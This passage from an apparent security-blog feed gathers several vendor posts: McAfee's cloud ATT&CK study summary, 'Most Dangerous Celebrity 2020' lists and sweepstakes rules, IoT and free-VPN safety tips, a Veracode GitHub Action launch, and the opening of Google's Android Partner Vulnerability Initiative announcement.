In the full report, we explore deeper implications of using MITRE ATT&CK for Cloud, including consensus on the value it brings to enterprise organizations, challenges with implementation, and many more interesting results from our investigation. Head to the full report here to dive in.  

One of the most promising benefits of MITRE ATT&CK is the unification of events derived from endpoints, network traffic, and the cloud together into a common language. Right now, only 39% of enterprises correlate events from these three environments in their threat investigation. Further adoption of MITRE ATT&CK over time will unlock the ability to efficiently investigate attacks that span multiple environments, such as a compromised endpoint accessing cloud data and exfiltrating to an adversary destination. 

This research demonstrates promising potential for MITRE ATT&CK in the enterprise SOC, with downstream benefits for the business. 87% of our respondents stated that adoption of MITRE ATT&CK will improve cloud security in their organization, with another 79% stating that it would also make them more comfortable with cloud adoption overall. A safer transition to cloud-based collaboration and app development can accelerate businesses, a subject we’ve investigated in the past [2]. MITRE ATT&CK can play a key role in secure cloud adoption, and defense of the enterprise overall.

Dive into the full research report for more on these findings! 


 

[1] https://www.mcafee.com/enterprise/en-us/forms/gated-form.html?docID=3804edf6-fe75-427e-a4fd-4eee7d189265&eid=LAVVPBCF

[2] https://www.mcafee.com/enterprise/en-us/forms/gated-form.html?docID=75e3a9dc-793e-488a-8d8a-8dbf31aa5d62&eid=5PES9QHP

The post MITRE ATT&CK for Cloud: Adoption and Value Study by UC Berkeley CLTC appeared first on McAfee Blogs.

Anna Kendrick Is McAfee’s Most Dangerous Celebrity 2020


During COVID-19, people stuck inside have scoured the internet for content to consume – often searching for free entertainment (movies, TV shows, and music) to avoid any extra costs. As these habits increase, so do the potential cyberthreats associated with free internet content – making our fourteenth Most Dangerous Celebrities study more relevant than ever.

To conduct our Most Dangerous Celebrities 2020 study, McAfee researched famous individuals to reveal which celebrities generate the most “dangerous” results – meaning those whose search results bring potentially malicious content to expose fans’ personal information.

Thanks to her recent starring roles, American actress Anna Kendrick has found herself at the top of McAfee’s 2020 Most Dangerous Celebrities list.

The Top Ten Most Dangerous Celebrities

You probably know Anna Kendrick from her popular roles in films like “Twilight,” “Pitch Perfect,” and “A Simple Favor.” She also recently starred in the HBO Max series “Love Life,” as well as the 2020 children’s film “Trolls World Tour.” Kendrick is joined in the top ten list by fellow actresses Blake Lively (No. 3), Julia Roberts (No. 8), and Jason Derulo (No. 10). Also included in the top ten list are American singers Mariah Carey (No. 4), Justin Timberlake (No. 5), and Taylor Swift (No. 6). Rounding out the rest of the top ten are American rapper Sean (Diddy) Combs (No. 2), Kate McKinnon (No. 9), and late-night talk show host Jimmy Kimmel (No. 7).


Lights, Camera, Security

Many consumers don’t realize that simple internet searches of their favorite celebrities could potentially lead to malicious content, as cybercriminals often leverage these popular searches to entice fans to click on dangerous links. This year’s study emphasizes that consumers are increasingly searching for content, especially as they look for new forms of entertainment to stream amidst a global pandemic.

With a greater emphasis on streaming culture, consumers could potentially be led astray to malicious websites while looking for new shows and movies to watch. However, people must understand that torrent or pirated downloads can lead to an abundance of cyberthreats. If an unsuspecting user clicks on a malicious link while searching for their favorite celebrity film, their device could suddenly become plagued with adware or malware.

Secure Yourself From Malicious Search Results

Whether you and your family are checking out your new favorite actress in her latest film or streaming a popular singer’s new album, it’s important to ensure that your searches aren’t potentially putting your online security at risk. Follow these tips so you can be a proactive fan while safeguarding your digital life:

Be careful what you click

 Users looking for information on their favorite celebrities should be cautious and only click on links to reliable sources for downloads. The safest thing to do is to wait for official releases instead of visiting third-party websites that could contain malware.

Refrain from using illegal streaming sites

When it comes to dangerous online behavior, using illegal streaming sites could wreak havoc on your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do yourself a favor and stream the show from a reputable source.

Protect your online safety with a cybersecurity solution

 Safeguard yourself from cybercriminals with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats.

Use a website reputation tool

 Use a website reputation tool such as McAfee WebAdvisor, which alerts users when they are about to visit a malicious site.

 Use parental control software

 Kids are fans of celebrities too, so ensure that limits are set for your child on their devices and use parental control software to help minimize exposure to potentially malicious or inappropriate websites.

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

 

The post Anna Kendrick Is McAfee’s Most Dangerous Celebrity 2020 appeared first on McAfee Blogs.

Check Out the McAfee Most Dangerous Celebrity 2020


Attention Streamers: Check Out the McAfee Most Dangerous Celebrity 2020 List

During COVID-19, people stuck inside have scoured the internet for content to consume – often searching for free entertainment (movies, TV shows, and music) to avoid any extra costs. As these habits increase, so do the potential cyberthreats associated with free internet content – making our fourteenth Most Dangerous Celebrities study more relevant than ever.

To conduct our Most Dangerous Celebrities 2020 study, McAfee researched famous individuals to reveal which celebrities generate the most “dangerous” results – meaning those whose search results bring potentially malicious content to expose fans’ personal information.

Known for his BAFTA-winning celebrity chat show and BBC radio show, the UK’s national treasure, Graham Norton, has found himself at the top of McAfee’s 2020 Most Dangerous Celebrities list.

The Top Ten Most Dangerous Celebrities

Graham Norton is a household name thanks to his hugely popular talk show, The Graham Norton Show, which has seen him interview A-listers including Nicole Kidman, Hugh Grant and Helen Mirren. He is also known for his BBC radio show, as well as his inimitable Eurovision commentary. Not shy of celebrity friends, Norton is joined in the top ten list by fellow national treasures such as Ricky Gervais (No. 2), Idris Elba (No. 7) and Mary Berry (No. 10). Also included in the top ten list are British actor Tom Hardy (No. 3) and Gavin and Stacey star, Ruth Jones (No. 4). Rounding out the rest of the top ten are UK’s very own Mick Jagger (No. 5), Aussie actress Margot Robbie (No. 6) and models Kate Moss (No. 8) and Bella Hadid (No. 9).

 

Lights, Camera, Security

Many consumers don’t realize that simple internet searches of their favorite celebrities could potentially lead to malicious content, as cybercriminals often leverage these popular searches to entice fans to click on dangerous links. This year’s study emphasizes that consumers are increasingly searching for content, especially as they look for new forms of entertainment to stream amidst a global pandemic.

With a greater emphasis on streaming culture, consumers could potentially be led astray to malicious websites while looking for celebrity gossip and new shows or movies to watch. For example, the fact that Graham is strongly associated with malicious search terms indicates that online criminals are using Britain’s love for celebrity gossip and the Eurovision for personal gain. If an unsuspecting user clicks on a malicious link while searching for their favorite celebrity film, their device could suddenly become plagued with adware or malware.

Secure Yourself From Malicious Search Results

Whether you and your family are checking out your new favorite actress in her latest film or streaming a popular singer’s new album, it’s important to ensure that your searches aren’t potentially putting your online security at risk. Follow these tips so you can be a proactive fan while safeguarding your digital life:

Be careful what you click

Users looking for information on their favorite celebrities should be cautious and only click on links to reliable sources for downloads. The safest thing to do is to wait for official releases instead of visiting third-party websites that could contain malware.

Refrain from using illegal streaming sites

When it comes to dangerous online behavior, using illegal streaming sites could wreak havoc on your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do yourself a favor and stream the show from a reputable source.

Protect your online safety with a cybersecurity solution

Safeguard yourself from cybercriminals with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats.

Use a website reputation tool

Use a website reputation tool such as McAfee WebAdvisor, which alerts users when they are about to visit a malicious site.

Use parental control software

Kids are fans of celebrities too, so ensure that limits are set for your child on their devices and use parental control software to help minimize exposure to potentially malicious or inappropriate websites.

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Check Out the McAfee Most Dangerous Celebrity 2020 appeared first on McAfee Blogs.

Most Dangerous Celebrity 2020 Sweepstakes

McAfee “Most Famous to Most Dangerous to Search for Online” 2020 MDC Sweepstakes

Terms and Conditions

NO PURCHASE OR PAYMENT OF ANY KIND NECESSARY TO ENTER OR WIN. A PURCHASE WILL NOT INCREASE YOUR CHANCES OF WINNING.

THIS SWEEPSTAKES IS INTENDED FOR PLAY IN THE UNITED STATES ONLY AND VOID IN FLORIDA, NEW YORK, AND RHODE ISLAND, AND WILL BE GOVERNED BY U.S. LAW.  DO NOT ENTER IF YOU ARE NOT BOTH ELIGIBLE AND LOCATED IN THE UNITED STATES, EXCLUDING FLORIDA, NEW YORK AND RHODE ISLAND, AT THE TIME OF ENTRY.

  1. Sweepstakes Period:

The McAfee “Most Famous to Most Dangerous to Search for Online” 2020 MDC Sweepstakes (the “Sweepstakes”) begins at 8:00:00 AM Pacific Daylight Time (“PDT”) on 10/6/2020 and ends at 5:00:00 PM PDT on 10/25/2020 (“Sweepstakes Period”). The Sweepstakes Administrator’s computer will be the official timekeeping device.

  2. How To Enter:

During the Sweepstakes Period, visit https://www.mcafee.com/en-us/consumer-support/2020-most-dangerous-celebrity.html (the “Website”), or the appropriate McAfee social handles listed below, and complete the following to receive the corresponding entries into the Sweepstakes:

Action: Social Comment – Facebook or Twitter

  • @McAfee: https://www.facebook.com/McAfee/
  • @McAfee_Home: https://twitter.com/mcafee_home?lang=en

# Entries Received: 1 (per comment)

Detail:

  • Go to the website to review the instructions and terms & conditions.
  • Click through to the applicable McAfee social page(s).
  • Follow that McAfee social handle.
  • Find the social posts using the campaign hashtag (#RiskyCelebSweeps)
  • Comment only on those posts for means of entry.
  • 1 comment = 1 entry into the sweepstakes for a chance to win.
  • Commenting on any of the sweepstakes specific posts (using #RiskyCelebSweeps) during the sweepstakes time frame allows for an entry for a chance to win the grand prize.

 

 

  3. Eligibility:

The Sweepstakes is open to legal residents of the United States, excluding residents of Florida, New York and Rhode Island and where otherwise prohibited by law, who are 18 years of age or older at the time of entry. Employees of McAfee, LLC, and each of their respective parents, subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

  4. Winner Selection/Odds:

There will be one grand prize winner. The prize winner will be selected at random from the final pool of entrants (commenters) on the applicable sweepstakes social posts. Anyone who comments on any of the sweepstakes posts, within the sweepstakes time period, is included in the Prize entry pool. Limit one (1) prize per person per household. By participating, entrants acknowledge the McAfee Privacy Notice and agree to be bound by the Official Sweepstakes Rules and the decisions of the Sponsor which shall be final and binding in all respects. The odds of winning depend on the total number of eligible entries received.

  5. Winner Notification:

Prize winner will be notified the week of 10/26/20.  No winners will be announced prior to this time.  All winners will be notified by the official McAfee Facebook (https://www.facebook.com/McAfee/ ) or McAfee_Home Twitter (https://twitter.com/McAfee_Home) page. McAfee will not ask you to provide any credit card information to claim a prize. Prize winner will be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within (4) days of written notification, or prize may be forfeited. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within four (4) calendar days from the first notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then prize may be forfeited. Sponsor is not responsible for any change of email address, mailing address and/or telephone number of entrants.  Sponsor reserves the right to select an alternative winner should the first winner fail to claim the prize.

  6. Prize:

GRAND PRIZE – Approximate ARV = $900

  • iPad Air
  • Disney+ subscription for 1-year (includes Disney, Pixar, Marvel, Star Wars, Nat. Geo)
  • Spotify Premium for 1-year
  • $200 Visa Gift Card

Limit one (1) prize per person per household. Prizes are non-transferable and no cash equivalent or substitution of prize is offered. Subscriptions are subject to the terms and conditions available at https://www.mcafee.com/en-us/consumer-support/2020-most-dangerous-celebrity.html. If a prize, or any portion thereof, cannot be awarded for any reason, Sponsor reserves the right to substitute prize with another prize of equal or greater value. Prize winner will be solely responsible for all federal, state and/or local taxes, and for any other fees or costs associated with the prizes they receive, regardless of whether it, in whole or in part, are used. Since the prize value exceeds $600, the prize winner will be issued a W-9 form to fill out and return prior to receiving their prize. The sweepstakes Sponsor must mail a copy of the 1099-MISC form postmarked by January 31st of the year following the year in which the winner won the prize.

  1. Internet/Limitations Of Liability:

Sponsor and others are not responsible for interrupted or unavailable network server or other connections; for miscommunications; failed telephone or computer transmissions; for jumbled, scrambled or misdirected entries or transmissions; for phone, electrical, network, computer hardware or software or program malfunctions, failures or difficulties; for other errors, omissions, interruptions, or deletions of any kind, whether human, typographical, mechanical or electronic; or for any damage to any person’s computer related to participating in the Sweepstakes. Sponsor and others are not responsible for illegible, unintelligible, late, lost, stolen or entries not received; for incorrect or inaccurate entry information, whether caused by Website users or by any of the equipment or programming associated with or utilized in the Sweepstakes; or for any typographical, technical or human errors which may occur in the processing of any entries in this Sweepstakes. Persons found tampering with or abusing any aspect of this Sweepstakes as solely determined by Sponsor will be disqualified and may be subject to prosecution. Any person attempting to enter using multiple email addresses, multiple identities, any bot, robotic or any other device or artifice to enter multiple times with different identities or email addresses or to interfere with the proper play of this Sweepstakes or to be otherwise behaving in an unsportsmanlike manner as determined by Sponsor will be disqualified from participation in the Sweepstakes.
If in the judgment of Sponsor, the Sweepstakes is compromised by virus, bugs, non-authorized human intervention or other causes beyond the control of Sponsor, which corrupts the administration, security, fairness or proper play of the Sweepstakes, Sponsor reserves the right, in its sole discretion, to modify, discontinue, suspend or terminate the Sweepstakes and randomly award the prizes from among all eligible, non-suspect entries received prior to any such modification, discontinuation, suspension or termination. Should multiple users of the same email account enter the Sweepstakes and a dispute thereafter arise regarding the identity of the entrant, the authorized account holder of said email account at the time of entry will be considered the entrant.  “Authorized account holder” is defined as the natural person who is assigned an email address by an Internet access provider, online service provider or other organization which is responsible for assigning email addresses or the domain associated with the submitted email address. In the event of a dispute as to the identity of an entrant based on his/her Facebook or Twitter account, the authorized Facebook or Twitter account holder submitted at time of entry will be deemed the entrant. Please see the privacy notice located at http://www.mcafee.com/us/about/privacy.html for details of Sponsor’s policies regarding the use of personal information collected in connection with this Sweepstakes. If you are selected as a winner, your information may also be included in a publicly-available winners list.

CAUTION: ANY ATTEMPT TO DELIBERATELY DAMAGE ANY WEBSITE OR UNDERMINE THE LEGITIMATE OPERATION OF THE SWEEPSTAKES IS A VIOLATION OF CRIMINAL AND CIVIL LAWS. SHOULD SUCH AN ATTEMPT BE MADE, THE SPONSORS RESERVE THE RIGHT TO SEEK DAMAGES OR OTHER REMEDIES (INCLUDING WITHOUT LIMITATION ATTORNEYS’ FEES) FROM ANY SUCH PERSON(S) RESPONSIBLE FOR THE ATTEMPT TO THE FULLEST EXTENT PERMITTED BY LAW.

  1. Release:

By participating in the Sweepstakes, each entrant releases and agrees to indemnify and hold harmless Sponsor, Prize Providers and others from and against any and all costs, claims, damages, (including, without limitation, any special, incidental or consequential damages), or any other injury, whether due to negligence or otherwise, to person(s) or property (including, without limitation, death or violation of any personal rights, such as violation of right of publicity/privacy, libel, or slander), due in whole or in part, directly or indirectly, to participation in the Sweepstakes, or arising out of participation in any Sweepstakes-related activity, or the receipt, enjoyment, participation in, use or misuse, of any prize.

 

  1. Publicity Rights:

By accepting a prize, the winner agrees to allow Sponsor and Sponsor’s designees the perpetual right to use his/her name, biographical information, photos or likeness, and statements for promotion, trade, commercial, advertising and publicity purposes, at any time or times, in all media now known or hereafter discovered, worldwide, including but not limited to on the Internet, without notice, review or approval and without additional compensation except where prohibited by law.  Any collection of personal information from entrants will be governed by the McAfee Privacy Policy.

 

  1.  Disputes:

EACH ENTRANT AGREES THAT ANY DISPUTES, CLAIMS, AND CAUSES OF ACTION ARISING OUT OF OR CONNECTED WITH THIS CONTEST OR ANY PRIZE AWARDED WILL BE RESOLVED INDIVIDUALLY, WITHOUT RESORT TO ANY FORM OF CLASS ACTION, AND EXCLUSIVELY BY THE UNITED STATES DISTRICT COURT FOR THE DISTRICT OF DELAWARE OR THE APPROPRIATE STATE COURT LOCATED IN DOVER OR WILMINGTON, DELAWARE. THESE OFFICIAL RULES ARE GOVERNED BY THE LAWS OF THE STATE OF DELAWARE WITHOUT REGARD TO CHOICE OF LAW OR CONFLICT OF LAWS RULES.  YOU WAIVE ANY AND ALL OBJECTIONS TO JURISDICTION AND VENUE IN THESE COURTS AND HEREBY SUBMIT TO THE JURISDICTION OF THOSE COURTS.

 

  1. Limitations of Liability:

TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE SPONSOR OR THE RELEASED PARTIES BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOSS OF USE, LOSS OF PROFITS OR LOSS OF DATA, WHETHER IN AN ACTION IN CONTRACT, TORT (INCLUDING NEGLIGENCE) OR OTHERWISE, ARISING OUT OF OR IN ANY WAY CONNECTED TO YOUR PARTICIPATION IN THE CONTEST OR USE OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE CONTEST OR ANY PRIZE, EVEN IF A RELEASED PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

 

TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE AGGREGATE LIABILITY OF THE RELEASED PARTIES (JOINTLY) ARISING OUT OF OR RELATING TO YOUR PARTICIPATION IN THE CONTEST OR USE OF OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE CONTEST OR ANY PRIZE EXCEED $10.  THE LIMITATIONS SET FORTH IN THIS SECTION WILL NOT EXCLUDE OR LIMIT LIABILITY FOR PERSONAL INJURY OR PROPERTY DAMAGE CAUSED BY PRODUCTS RENTED FROM THE SPONSOR, OR FOR THE RELEASED PARTIES’ GROSS NEGLIGENCE, INTENTIONAL MISCONDUCT, OR FOR FRAUD.

  1. The Sweepstakes and the Official Rules are governed by US law and are subject to all applicable federal, state and local laws and regulations. All issues and questions concerning the construction, validity, interpretation and enforceability of the Official Rules, or the rights and obligations of Entrant and Sponsor in connection with the Sweepstakes, shall be governed by, and construed in accordance with, the laws of the State of New York, U.S.A., without giving effect to the conflict of laws rules thereof, and any matters or proceedings which are not subject to arbitration as set forth above, in these Official Rules and/or for entering any judgment on an arbitration award, shall take place in the State of New York.

 

Winner’s List:  For a list of winners, mail a self-addressed, stamped envelope to: “Most Famous to Most Dangerous to Search for Online” to 100 Crown Street, New Haven, CT 06510. Requests must be received by 11/30/20.

 

Sponsors: McAfee Corporate Headquarters, 2821 Mission College Blvd., Santa Clara, CA 95054

 

Administrator: Response Marketing, 100 Crown Street 3rd Floor, New Haven, CT 06510

 

The post Most Dangerous Celebrity 2020 Sweepstakes appeared first on McAfee Blogs.

Veracode Makes DevSecOps a Seamless Experience With GitHub Code Scanning

Developers face a bevy of roadblocks in their race to meet tight deadlines, which means they often pull from risky open source libraries and prioritize security flaws on the fly. In a recent ESG survey report, Modern Application Development Security, we saw that 54% of organizations push vulnerable code just to meet critical deadlines, and while they plan for remediation on a later release, lingering flaws only add to risky security debt. With speed a critical factor in what makes or breaks the success of your application deployments, that means the health of your code – and your security – is on the line.

GitHub Actions are an intuitive way to solve the need for speed without sacrificing quality, helping your developers stay on schedule by enabling them to build, test, and deploy code directly from GitHub. And with over 50 million developers on GitHub, plus more than 200,000 automated fixes merged into GitHub repositories since May of 2019, it’s clear that GitHub is a hotspot for developers. When paired with the right application security (AppSec) scan types and SaaS-based approaches, this integration makes GitHub Actions an invaluable part of your development team’s workflow.

That’s why we’re excited to announce our new GitHub Action to help streamline your AppSec workflow for the developers on your team. The action is directly embedded within the native GitHub code scanning user interface, ensuring your DevSecOps practices are seamless, efficient, and effective. By making Veracode’s AppSec tools accessible in a familiar interface like GitHub, developers on your team can jump right into secure coding with critical testing and analysis that won’t halt projects or slow production down.

The Veracode solution to enhanced workflows

Developers can perform Veracode’s Static Policy Scan or Pipeline Scan and see the results of that scan within the GitHub Security tab. The ability to invoke Veracode’s Static Analysis (SAST) scans from within their own GitHub projects significantly expands the testing capability for developers leveraging GitHub workflows, and allows them to build security into their DevOps processes to scale development across their team.

That’s less downtime and fewer bottlenecks for faster innovation. With such a high frequency of commits flowing through GitHub (more than 2,000 direct contributors made commit contributions to TensorFlow alone in 2019), Veracode’s multi-scan and SaaS-based solutions mean that our customers have a leg-up when it comes to harnessing GitHub Actions for speed and efficiency.

This functionality comes as part of the GitHub code scanning launch, with our GitHub Action available in the GitHub Marketplace. “Veracode is a leader in application security and truly understands the importance of shifting left in the development lifecycle to enable teams to find and fix flaws at scale,” says John Leon, VP of Business Development at GitHub. “With software development moving at breakneck speed, this new GitHub Action further enables our joint customers to develop secure software, without compromising speed or quality – all within a familiar interface.”

My Code, Our Code, Production Code

Veracode’s Static Analysis solution was a natural addition to GitHub’s new code scanning feature as it enables DevSecOps with fast, automated, and actionable security feedback. This feedback is delivered directly to developers in their pipeline through each critical My Code, Our Code, and Production Code stage.

Working within the GitHub environment, your developers have the control they need. Scan results are converted into GitHub code scanning alerts and developers receive clear remediation advice to keep their projects moving forward with fewer delays. Once code is at the deployment stage, the Veracode Policy Scan provides a robust assessment of your application code – and an audit trail for compliance to prove security efforts.

Veracode scan results (from more than 15 trillion lines of code to date) are highly accurate as a result of the intelligence of our SaaS platform, meaning there’s no need for manual tuning when you need to adjust course. Ready to scale your DevSecOps initiatives for efficiency? Visit the GitHub Marketplace to get started.

Cybersecurity Awareness Month: If You Connect It, Protect It

October is Cybersecurity Awareness Month, which is led by the U.S. government’s Cybersecurity and Infrastructure Security Agency (CISA) in conjunction with the National Cyber Security Alliance (NCSA)—a national non-profit focused on cybersecurity education & awareness. McAfee is pleased to announce that we’re a proud participant.

We live in a day and age when even lightbulbs can be hacked.

Perhaps you’ve caught the stories in the news: various devices like home cameras, smart appliances, and other Internet of Things (IoT) devices falling prey to hackers and attacks, such as when the Mirai botnet took out large swathes of the internet in 2016. As posted by Statista, estimates project that the world will have nearly 40 billion IoT devices in the next five years and upwards of 50 billion by 2030. That’s in homes and businesses alike, ranging anywhere from digital assistants, smart watches, medical devices, thermostats, vehicle fleet management devices, smart locks, and yes, even the humble lightbulb—and like our computers, laptops, smartphones, and tablets, they all need to be protected.

The reason is simple: your network is only as safe as the weakest device that’s on it. And we’re putting so much more on our networks than ever before. In effect, that means our homes have more targets for hackers than ever before as well. In the hands of a dedicated crook, one poorly protected device can open the door to your entire network—much like a thief stealing a bike by prying open the weak link in a chain lock. Therefore, so goes the saying, “If You Connect It, Protect It.”

The Eight-Point List for Protecting Your IoT Devices

What’s challenging is that our IoT devices don’t always lend themselves to the same sort of protections that our computers, laptops, and phones do. For example, you can’t actually install security software directly on them. However, there are things you can do to protect those devices, and the network they’re on too.

1) Do your IoT homework

Just because that new smart device that’s caught your eye can connect to the internet doesn’t mean that it’s secure. Before you purchase, read up on reviews and comments from other customers. Look for news articles about the device manufacturer too. The fact of the matter is that some IoT device manufacturers are much better at baking security protocols into their devices than others, so look into their track record to see if you can uncover any issues with their products or security practices. Information such as this can help you make an even more informed choice.

2) Don’t use the default—Set a strong, unique password

One issue with many IoT devices is that they often come with a default username and password. This could mean that your device, and thousands of others just like it, all share the same credentials, which makes it painfully easy for a hacker to gain access to them as those default usernames and passwords are often published online.

When you purchase an IoT device, set a fresh password using a strong method of password creation.  And keep those passwords safe. Instead of keeping them on a notebook or on sticky notes, consider using a password manager. It acts as a database for all your passwords and stores new codes as you create them. As always, don’t store them in an unprotected file on your computer, which can be subject to a hack or data loss.

3) Use two-factor authentication

Our banks, many of the online shopping sites we use, and numerous other accounts use two-factor authentication to make sure that when we’re logging in we really are who we say we are. In short, a username and password combo is an example of one-factor authentication. The second factor in the mix is something you, and only you, own, like your mobile phone. Thus when you log in and get a prompt to enter a security code that’s sent to your mobile phone, you’re taking advantage of two-factor authentication. If your IoT device supports two-factor authentication as part of the login procedure, put it to use and get that extra layer of security.

4) Secure your internet router

Your router acts as the internet’s gateway into your home. From there, it works as a hub that connects all of your devices—computers, tablets, and phones, along with your IoT devices as well. That means it’s vital to keep your router secure. A quick word about routers: you typically access them via a browser window and a specific address that’s usually printed somewhere on your router. If you’re renting your router or you’ve purchased it through your internet provider, they should have help documentation that can guide you through this process. Likewise, if you purchased your own, your manual should provide the guidance you need.

As we mentioned above, the first thing to do is change the default password and name of your router if you haven’t done so already. Again, use a strong method of password creation. Also, change the name of your router. When you choose a new one, go with a name that doesn’t give away your address or identity. Something unique and even fun like “Pizza Lovers” or “The Internet Warehouse” are options that mask your identity and are memorable for you too. While you’re making that change, you can also check that your router is using an encryption method, like WPA2, which will keep your signal secure. If you’re unsure, reach out to your internet provider or check the documentation that came with your router.

5) Set up a guest network specifically for your IoT devices

Just as you can offer your guests secure access that’s separate from your own devices, creating an additional network on your router allows you to keep your computers and smartphones separate from IoT devices. This way, if an IoT device is compromised, a hacker will still have difficulty accessing your other devices, like computers and smartphones, along with the data and info that you have stored on them. You may also want to consider investing in an advanced internet router that has built-in protection and can secure and monitor any device that connects to your network.

6) Use a VPN and a comprehensive security solution

Another line of defense that can hamper hackers is using a VPN, which allows you to send and receive data while encrypting your information so others can’t read it. When your data traffic is scrambled that way, it’s shielded from prying eyes, which helps protect your network and the devices you have connected to it.

7) Update!

As with our computers, laptops, phones, tablets, and apps, make sure you have the latest software updates for your IoT devices. The reasons here are the same: one, they’ll make sure you’re getting the latest functionality from your device; and two, updates often contain security upgrades. If there’s a setting that lets you receive automatic updates, enable it so that you always have the latest.

8) Protect your phone

You’ve probably seen that you can control a lot of your connected things with your smartphone. We’re using them to set the temperature, turn our lights on and off, and even see who’s at the front door. With that, it seems like we can add the label “universal remote control” to our smartphones—so protecting our phones has become yet more important. Whether you’re an Android owner or iOS owner, get security software installed on your phone so you can protect all the things it accesses and controls—in addition to you and the phone as well.

And protect your other things too

And of course, let’s not forget our computers and laptops. While we’ve been primarily talking about IoT devices here, it’s a good reminder that computers and laptops need protection too. Using a strong suite of security software like McAfee® Total Protection can help defend your entire family from the latest threats and malware, make it safer to browse, and look out for your privacy too.

If you connect it, protect it

We’re connecting our homes and ourselves with IoT devices at a tremendous rate—now at an average of 10 connected devices in our homes in the U.S. Gone are the days when all we had was a computer or phone or two to look after. Now, even when we’re not in front of a laptop or have a smartphone in our hand, we’re still online, nearly all the time. Take this week to make sure that what you’ve connected is protected. Even that little lightbulb.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Cybersecurity Awareness Month: If You Connect It, Protect It appeared first on McAfee Blogs.

5 Reasons Why You Should Avoid Free VPNs

A Virtual Private Network (VPN) is a technology that offers total security for all your digital activities. It serves as a barrier against third-party groups, hackers, cyber threats, malware, and sensitive data leakage.

More than ever, we need to invest in high-end protection to ensure our privacy is never compromised. VPNs are in high demand under current conditions, where most people stay at home and work remotely. With increased online activity, it’s high time to protect your privacy.

Free VPNs are enticing and offer ‘great’ security without extra cost. Their services are too good to be true, so you should be skeptical of them and stay away.

Are There Alternatives To Top-Rated VPN Providers? 

The risk of using a free VPN is high, as it does not offer robust encryption compared to paid services. It is better to pay for a cheap VPN service than to compromise your security. Affordable VPN services offer powerful data encryption for people with limited budgets. They provide standard encryption technology to ensure your privacy is protected and your digital activities are secured.

There are a few reliable and trusted VPN providers that offer affordable plans, so there is no need to use free services that threaten your security. These are great alternatives that won’t hurt your wallet but will surely be of great help, especially if you’re constantly online.

5 Facts Why Free VPNs Are A No-No

Free VPN software keeps records of your digital activities and sells them to third parties. It offers encryption that doesn’t ‘really’ mask your activities or protect your identity. Free VPN services log all your sensitive data, which is already a threat to your privacy. Aside from that, here are five things you need to remember about why free VPNs are a no-no.

  1. Monitor And Sell All Collected Data

VPNs act as your protective barrier against digital threats while you’re online. They secure all your data, online activities, and private information against prying eyes, government surveillance, etc. VPNs block hackers and your ISP from collecting or selling data to gain profit.

A free VPN flips that arrangement: you become the cash cow that funds the service, which is offered in exchange for the data collected from you. This sensitive data is then sold to third parties, which poses a threat not just to your information; your privacy is at stake too.

  2. Leaks IP Addresses

Robust VPN solutions offer total security and encryption for all your digital activities and traffic. They serve as your secret portal on the world wide web, shielding you from cyber threats, hackers, and prying eyes.

Using a free VPN is like using a tunnel with tons of holes that can leak your data or IP address. Hackers can track your activity, prying eyes can monitor you, and, worse, you can be exposed to tons of privacy threats.

  3. They Are Not Safe

Free VPN solutions are risky. They are a dangerous threat to your security and privacy. Running a VPN service is pricey, and offering it for free to users is fishy. That means your data is the menu served for other people to devour.

  4. Aggressive Ads

Free VPNs use aggressive ads, and a single click can land you on a hazardous site. That can expose you to tons of threats and to hackers who can instantly access your information and files. Aside from the privacy threats, a high volume of ads can also weigh your system down and affect your browsing experience.

  5. Malware Exposure

Free VPN solutions contain malware that can damage not just your privacy but your devices. You have a higher chance of being exposed to these nasty bugs when you download such software. Mobile ransomware and malware can steal your sensitive information like social security details and bank login details.

Conclusion

Free VPNs are enticing and offer ‘robust security’ without the need to pay hundreds of dollars a year. However, your security is at stake, together with your sensitive data and information.

Though a free VPN can help you stream region-restricted websites, you need to reconsider your options and the potential threats. Free VPNs are not safe; if you want to secure your digital presence, you can opt for an affordable VPN solution that offers high-end encryption to ensure your privacy and data are protected against potential hacks.

The post 5 Reasons Why You Should Avoid Free VPNs appeared first on CyberDB.

Announcing the launch of the Android Partner Vulnerability Initiative

Posted by Kylie McRoberts, Program Manager and Alec Guertin, Security Engineer

Google’s Android Security & Privacy team has launched the Android Partner Vulnerability Initiative (APVI) to manage security issues specific to Android OEMs. The APVI is designed to drive remediation and provide transparency to users about issues we have discovered at Google that affect device models shipped by Android partners.

Another layer of security

Android incorporates industry-leading security features and every day we work with developers and device implementers to keep the Android platform and ecosystem safe. As part of that effort, we have a range of existing programs to enable security researchers to report security issues they have found. For example, you can report vulnerabilities in Android code via the Android Security Rewards Program (ASR), and vulnerabilities in popular third-party Android apps through the Google Play Security Rewards Program. Google releases ASR reports in Android Open Source Project (AOSP) based code through the Android Security Bulletins (ASB). These reports are issues that could impact all Android based devices. All Android partners must adopt ASB changes in order to declare the current month’s Android security patch level (SPL). But until recently, we didn’t have a clear way to process Google-discovered security issues outside of AOSP code that are unique to a much smaller set of specific Android OEMs. The APVI aims to close this gap, adding another layer of security for this targeted set of Android OEMs.

Improving Android OEM device security

